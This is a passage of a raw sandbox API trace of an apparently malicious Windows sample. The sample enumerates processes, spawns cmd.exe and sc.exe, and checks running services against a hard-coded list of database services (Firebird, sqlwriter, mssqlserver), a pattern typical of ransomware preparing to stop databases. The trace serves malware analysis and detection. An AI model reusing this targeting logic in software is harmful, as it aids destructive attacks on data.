dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0167.749] lstrlenW (lpString="conhost.exe") returned 11 [0167.749] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0167.750] lstrlenW (lpString="sppsvc.exe") returned 10 [0167.750] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0167.751] lstrlenW (lpString="dllhost.exe") returned 11 [0167.751] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0167.751] lstrlenW (lpString="wdgmug.exe") returned 10 [0167.751] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1260, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0167.752] lstrlenW (lpString="cmd.exe") returned 7 [0167.752] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1160, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0167.753] lstrlenW (lpString="conhost.exe") returned 11 [0167.753] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x764, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0167.754] lstrlenW (lpString="sc.exe") returned 6 [0167.754] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x764, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0167.754] lstrlenW (lpString="conhost.exe") returned 11 [0167.754] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0167.755] lstrlenW (lpString="WMIADAP.exe") returned 11 [0167.755] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0167.755] CloseHandle (hObject=0x2ec) returned 1 [0167.756] Sleep (dwMilliseconds=0x1f4) [0168.979] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x74e9a8 [0168.980] EnumServicesStatusExW (in: hSCManager=0x74e9a8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 0 [0168.980] GetLastError () returned 0xea [0168.980] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1dfc) returned 0x3ea1c00 [0168.980] EnumServicesStatusExW (in: hSCManager=0x74e9a8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3ea1c00, cbBufSize=0x1dfc, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3ea1c00, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 1 [0168.981] CloseServiceHandle (hSCObject=0x74e9a8) returned 1 [0168.982] lstrlenW (lpString="Appinfo") returned 7 [0168.982] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0168.982] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0168.982] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0168.982] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0168.982] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0168.982] lstrlenW (lpString="AppXSvc") returned 7 [0168.982] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0168.982] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0168.982] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0168.982] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0168.982] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0168.982] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0168.982] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0168.982] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0168.982] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0168.982] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0168.982] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0168.982] lstrlenW (lpString="Audiosrv") returned 8 [0168.982] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0168.982] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0168.982] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0168.983] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0168.983] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0168.983] lstrlenW (lpString="BFE") returned 3 [0168.983] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0168.983] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0168.983] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0168.983] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0168.983] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0168.983] lstrlenW (lpString="BITS") returned 4 [0168.983] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0168.983] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0168.983] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0168.983] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0168.983] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0168.983] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0168.983] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0168.983] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0168.983] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0168.983] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0168.983] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0168.983] lstrlenW (lpString="CDPSvc") returned 6 [0168.983] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0168.983] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0168.984] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0168.984] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0168.984] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0168.984] lstrlenW (lpString="ClickToRunSvc") returned 13 [0168.984] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0168.984] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0168.984] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0168.984] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0168.984] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0168.984] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0168.984] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0168.984] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0168.984] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0168.984] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0168.984] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0168.984] lstrlenW (lpString="CryptSvc") returned 8 [0168.984] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0168.984] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0168.984] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0168.984] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0168.984] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0168.984] lstrlenW (lpString="DcomLaunch") returned 10 [0168.984] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0168.985] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0168.985] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0168.985] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0168.985] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0168.985] lstrlenW (lpString="Dhcp") returned 4 [0168.985] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0168.985] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0168.985] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0168.985] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0168.985] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0168.985] lstrlenW (lpString="Dnscache") returned 8 [0168.985] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0168.985] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0168.985] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0168.985] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0168.985] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0168.985] lstrlenW (lpString="DoSvc") returned 5 [0168.985] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0168.985] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0168.985] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0168.985] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0168.985] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0168.985] lstrlenW (lpString="DPS") returned 3 [0168.985] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0168.985] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0168.986] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0168.986] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0168.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0168.986] lstrlenW (lpString="DusmSvc") returned 7 [0168.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0168.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0168.986] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0168.986] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0168.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0168.986] lstrlenW (lpString="EventLog") returned 8 [0168.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0168.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0168.986] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0168.986] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0168.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0168.986] lstrlenW (lpString="EventSystem") returned 11 [0168.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0168.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0168.986] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0168.986] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0168.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0168.986] lstrlenW (lpString="FontCache") returned 9 [0168.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0168.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0168.987] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0168.987] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0168.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0168.987] lstrlenW (lpString="gpsvc") returned 5 [0168.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0168.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0168.987] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0168.987] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0168.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0168.987] lstrlenW (lpString="iphlpsvc") returned 8 [0168.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0168.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0168.987] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0168.987] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0168.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0168.987] lstrlenW (lpString="KeyIso") returned 6 [0168.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0168.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0168.987] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0168.987] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0168.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0168.987] lstrlenW (lpString="LanmanServer") returned 12 [0168.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0168.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0168.987] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0168.987] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0168.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0168.988] lstrlenW (lpString="LanmanWorkstation") returned 17 [0168.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0168.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0168.988] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0168.988] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0168.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0168.988] lstrlenW (lpString="lfsvc") returned 5 [0168.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0168.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0168.988] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0168.988] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0168.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0168.988] lstrlenW (lpString="lmhosts") returned 7 [0168.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0168.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0168.988] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0168.988] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0168.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0168.988] lstrlenW (lpString="LSM") returned 3 [0168.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0168.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0168.988] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0168.988] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0168.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0168.988] lstrlenW (lpString="MpsSvc") returned 6 [0168.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0168.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0168.989] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0168.989] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0168.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0168.989] lstrlenW (lpString="NcbService") returned 10 [0168.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0168.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0168.989] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0168.989] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0168.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0168.989] lstrlenW (lpString="netprofm") returned 8 [0168.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0168.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0168.989] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0168.989] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0168.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0168.989] lstrlenW (lpString="NlaSvc") returned 6 [0168.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0168.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0168.989] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0168.989] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0168.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0168.989] lstrlenW (lpString="nsi") returned 3 [0168.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0168.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0168.989] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0168.989] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0168.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0168.989] lstrlenW (lpString="PcaSvc") returned 6 [0168.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0168.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0168.990] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0168.990] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0168.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0168.990] lstrlenW (lpString="PlugPlay") returned 8 [0168.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0168.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0168.990] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0168.990] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0168.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0168.990] lstrlenW (lpString="Power") returned 5 [0168.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0168.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0168.990] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0168.990] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0168.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0168.990] lstrlenW (lpString="ProfSvc") returned 7 [0168.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0168.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0168.990] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0168.990] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0168.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0168.990] lstrlenW (lpString="RpcEptMapper") returned 12 [0168.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0168.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0168.990] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0168.991] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0168.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0168.991] lstrlenW (lpString="RpcSs") returned 5 [0168.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0168.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0168.991] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0168.991] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0168.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0168.991] lstrlenW (lpString="SamSs") returned 5 [0168.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0168.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0168.991] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0168.991] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0168.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0168.991] lstrlenW (lpString="Schedule") returned 8 [0168.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0168.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0168.991] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0168.991] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0168.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0168.991] lstrlenW (lpString="SecurityHealthService") returned 21 [0168.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0168.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0168.991] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0168.991] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0168.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0168.991] lstrlenW (lpString="SENS") returned 4 [0168.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0168.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0168.992] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0168.992] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0168.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0168.992] lstrlenW (lpString="ShellHWDetection") returned 16 [0168.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0168.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0168.992] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0168.992] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0168.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0168.992] lstrlenW (lpString="Spooler") returned 7 [0168.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0168.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0168.992] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0168.992] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0168.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0168.992] lstrlenW (lpString="sppsvc") returned 6 [0168.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0168.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0168.992] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0168.992] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0168.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0168.992] lstrlenW (lpString="SSDPSRV") returned 7 [0168.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 